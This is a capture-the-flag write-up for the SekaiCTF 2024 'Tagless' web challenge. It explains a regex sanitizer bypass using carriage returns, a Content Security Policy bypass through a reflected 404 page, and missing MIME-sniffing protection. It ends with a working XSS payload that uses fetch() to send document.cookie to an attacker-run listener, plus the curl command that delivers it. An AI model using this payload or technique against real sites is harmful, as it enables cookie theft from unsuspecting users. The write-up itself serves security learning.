SekaiCTF 2024 Tagless Writeup

Published: September 18, 2024, updated: February 5, 2025

This article contains a writeup for the SekaiCTF 2024 Tagless challenge.

Challenge notes


Who needs tags anyways

Author: elleuch

Solution summary

Despite a sound Content Security Policy (CSP) in place, the app contained four vulnerabilities:

These vulnerabilities allowed me to retrieve the flag.

Recommended measures for system administrators:


Download and run app

The challenge provides its app source code under the following address:

These are the unpacked archive contents:

unzip -l
  Length      Date    Time    Name
---------  ---------- -----   ----
      758  08-16-2024 11:19   Dockerfile
       60  08-16-2024 11:19
       59  08-16-2024 11:19   requirements.txt
        0  08-16-2024 11:19   src/
     1277  08-16-2024 11:19   src/
      987  08-16-2024 11:19   src/
        0  08-16-2024 11:19   src/static/
     1816  08-16-2024 11:19   src/static/app.js
        0  08-16-2024 11:19   src/templates/
     1807  08-16-2024 11:19   src/templates/index.html
---------                     -------
     6764                     10 files

The archive contains the following parts:

I build and run the Tagless challenge code using the supplied Dockerfile. To build the container, I use podman.

unzip -d
podman build --tag tagless --file
podman run -p 5000:5000 --name tagless tagless

Understanding the / page script

Screenshot of the page served at /

Screenshot of the page served at / Open in new tab (full image size 68 KiB)

The / landing page accepts the query parameters fulldisplay and auto_input.

I investigate src/static/app.js to see what happens when the landing page loads. The following shows the code path I care about. I’ve annotated and slightly abbreviated some parts:

// src/static/app.js
function sanitizeInput(str) {
  str = str
    .replace(/<.*>/gim, "")
    .replace(/<\.*>/gim, "")
    .replace(/<.*>.*<\/.*>/gim, "");
  return str;

function autoDisplay() {
  const urlParams = new URLSearchParams(;
  const input = urlParams.get("auto_input");

function displayInput(input) {
  const urlParams = new URLSearchParams(;
  const fulldisplay = urlParams.get("fulldisplay");

  var sanitizedInput = "";
  sanitizedInput = sanitizeInput(input);
  var iframe = document.getElementById("displayFrame");
  var iframeContent = `
        <!DOCTYPE html>
            <link href="" rel="stylesheet">
                body {
                    font-family: 'Press Start 2P', cursive;
                    color: #212529;
                    padding: 10px;
    `;"text/html", "replace");

  if (fulldisplay && sanitizedInput) {
    var tab = open("/");


When the landing page loads with an address of the form /?autodisplay&auto_input=XSS the following things take place:

  1. Call autoDisplay()
  2. Retrieve the auto_input query parameter from the current document’s address.
  3. Retrieve the fulldisplay query parameter from the current document’s address.
  4. Sanitize auto_input in sanitizeInput() by:
  5. Removing all strings of the form <TAG> or <> using the regular expression <.*>.
  6. Removing all strings of the form <.TAG> or <.> using the regular expression <\.*> (typo?).
  7. Remove all strings of the form <TAG>...</TAG> or just <></> using the regular expression <.*>.*<\/.*>.
  8. Create a new <iframe> with some standard HTML and the sanitized input from 7. inside a <body> tag.
  9. Open the <iframe> in a new window using open("/").document.write()

The (abbreviated) <iframe> contents looks like the following, for input auto_input=XSS:

<!doctype html>
  <!-- ... -->
The app strips HTML tag-like things, hm.

The app strips HTML tag-like things, hm. Open in new tab (full image size 69 KiB)

The regular expressions in sanitizeInput() have one fatal flaw. The punctuation character . matches anything, except for newline-like characters. sanitizeInput() rejects snippets containing a tag like<script>window.alert()</script>.

If you add a few carriage return in the right spot, you can fool the sanitizeInput() function into not rejecting your input. After messing around in regex101 for a while, I came up with the following prototype injection:


Where \0x0d indicates a carriage return insertion. Inserted into an address, this looks like the following:


Understanding the /report endpoint

Next, I study the Python app’s source code to see how I can use this sanitizeInput() vulnerability to perform a reflected XSS attack. The following shows the annotated source for report() in src/

# src/
@app.route("/report", methods=["POST"])
def report():
    # The actual Bot() code is described further below
    bot = Bot()
    # Require `url` x-www-url-form-encoded parameter
    url = request.form.get('url')
    if url:
            parsed_url = urlparse(url)
        # URL must be
        # 1. valid URL
        except Exception:
            return {"error": "Invalid URL."}, 400
        # 2. start with http/https
        if parsed_url.scheme not in ["http", "https"]:
            return {"error": "Invalid scheme."}, 400
        # 3. must be localhost or
        if parsed_url.hostname not in ["", "localhost"]:
            return {"error": "Invalid host."}, 401

        # the bot visits the page, but nothing else
        return {"visited":url}, 200
        return {"error":"URL parameter is missing!"}, 400

The report endpoint behaves like a typical XSS bot endpoint used in a Capture The Flag (CTF). It lets CTF participants simulate another user opening a link provided by them. The report endpoint in turn then triggers a reflected XSS injection.

For example, if you pass the address http://localhost:5000 to the /report endpoint as the url parameter, the app spawns a headless browser and visits the address url.

With Curl, you can achieve the same thing using the following command:

curl http://localhost:5000/report --data 'url=http://localhost:5000'

To understand what happens when the bot visits the page using bot.visit(url), I inspect Bot class source in src/

from selenium import webdriver
class Bot:
    def __init__(self):
        chrome_options = Options()
        # ...
        self.driver = webdriver.Chrome(options=chrome_options)

    def visit(self, url):
        # Visit the app's landing page
        # Add a document.cookie containing the challenge flag
            "name": "flag",
            "value": "SEKAI{dummy}",
            "httponly": False
        # Retrieve the url passed to us in the `/report` POST request
        # Wait a bit, and we are finished
        print(f"Visited {url}")
# ...

If I want to read out the cookie, I need to craft a JavaScript payload that reads out document.cookie and sends it to an endpoint that I provide using fetch().

I then insert this payload into the landing page /?auto_input=XSS query parameter, and instruct the /report endpoint to open it using the Bot():

curl \
  --data 'url='

In comes a CSP

While I had the ambition of solving this challenge after only a few minutes, I realized that the challenge creator put a Content Security Policy (CSP) in place. This prevents an attacker from injecting untrusted scripts, as you can see in the following snippets of Python app code:

# src/
def add_security_headers(resp):
    resp.headers['Content-Security-Policy'] = "script-src 'self'; style-src 'self' 'unsafe-inline'; font-src;"
    return resp

The following shows the relevant CSP that prevents the browser from running untrusted JavaScript:

script-src `self`;

Because of this CSP, browsers ignore any script sources that come from somewhere other than the page’s origin at Should an attacker now try to inject a JavaScript snippet like the following, it gets blocked.

<!-- The following is CSP `unsafe-inline` -->

The browser refuses to run this JavaScript code because the CSP forbids running unsafe-inline scripts and only permits self. Read more about available CSP source values on MDN.

Opening the following address doesn’t work, even when you try to circumvent the script tag filtering:<script%0d>window.alert()</%0dscript>

The only way you can run JavaScript involves making a script “look” like it comes from the app origin itself.

Exploiting the 404 endpoint

I direct my attention towards the 404 endpoint. The following shows the source code for the app’s 404 error handler:

def page_not_found(error):
    path = request.path
    return f"{path} not found"

This returns a 404 HTTP response and a well formatted response body. If you open the non-existing address /does-not-exist, Starlette dutifully returns:

/does-not-exist not found

You can append anything to this address anything. Starlette gives you the text back, unchanged. You can even include something that looks like JavaScript:;window.alert();//

The applications gives me the following response when opening this address:

window.alert(); // not found

In turn, the browser runs this JavaScript code. I turn the path starting with a / into a stranded regular expression literal, and the trailing not found into a nice little comment. This way, I can create any JavaScript snippet and make it look like it comes from the same origin.

This is how I can circumvent the content security policy.

Missing file type hardening

Many tend to forget about MIME type sniffing

Even better, the app conveniently forgets to instruct the browser to ignore Content-Type MIME types when evaluating the any not found address. Developers need to set X-Content-Type-Options.

The app serves the error page as Content-Type: text/plain, but the browser thinks its smarter and interprets it as Content-Type: application/javascript instead. This is why you have to harden your apps.

Crafting the XSS payload

I have achieved the following four things:

I’ve encountered a little hiccup while working on this challenge. I confused the domain localhost for Cookie domains must match exactly, even for localhost. The driver sets the Bot’s cookie domain to, as you can see in the following snippet in Bot.visit(self, url):

# Add a document.cookie containing the challenge flag
    "name": "flag",
    "value": "SEKAI{dummy}",
    "httponly": False

I spin up a request catcher using I prefer it over ngrok for two reasons:

  1. It costs much less than ngrok ($4 per month).
  2. provides their client as free software and available on nixpkgs.

I prefer free software for many reasons. NixOS complains about running the non-free ngrok, for a good reason. NixOS shows you long-winded warnings when trying to install it.

I start a new challenge instance on Then, I launch tunnelto with socat listening.

# Launch tunnelto
tunnelto --subdomain XXXXXXXXXXX --port 4444
# Launch socat
socat -v -d TCP-Listen:4444,fork STDIO

I craft the final payload and store it in payload.txt:

// payload.txt<script src=";fetch(''.concat('',document.cookie));//"%0d/></script%0d>hello

Broken apart, the payload consists of the following parts:

// the `/` page url
const url = "";
// the script we make the 404 handler generate for us
const innerScript =
// the URL that will return the innerScript
const errorUrl = `;${innerScript};//`;
// the script tag we inject into the iframe
const outerScript = `<script src="${errorUrl}"%0d/></script%0d>`;
// the full payload we want to pass to `/report`
const payload = `${url}${outerScript}`;

“URL!” “Script!” “Payload!” “Evasion!”
“Go Captain XSS!”

“By your powers combined, I am Captain XSS!”

I don’t like messing with encoding addresses too much. I let Curl handle encoding the script using the --data-urlencode flag. This flags instructs it to apply the needed quoting to the contents of the payload file payload.txt.

curl \
    --data-urlencode url@payload.txt

socat receives the flag, and I solve the challenge.


I would be thrilled to hear from you! Please share your thoughts and ideas with me via email.

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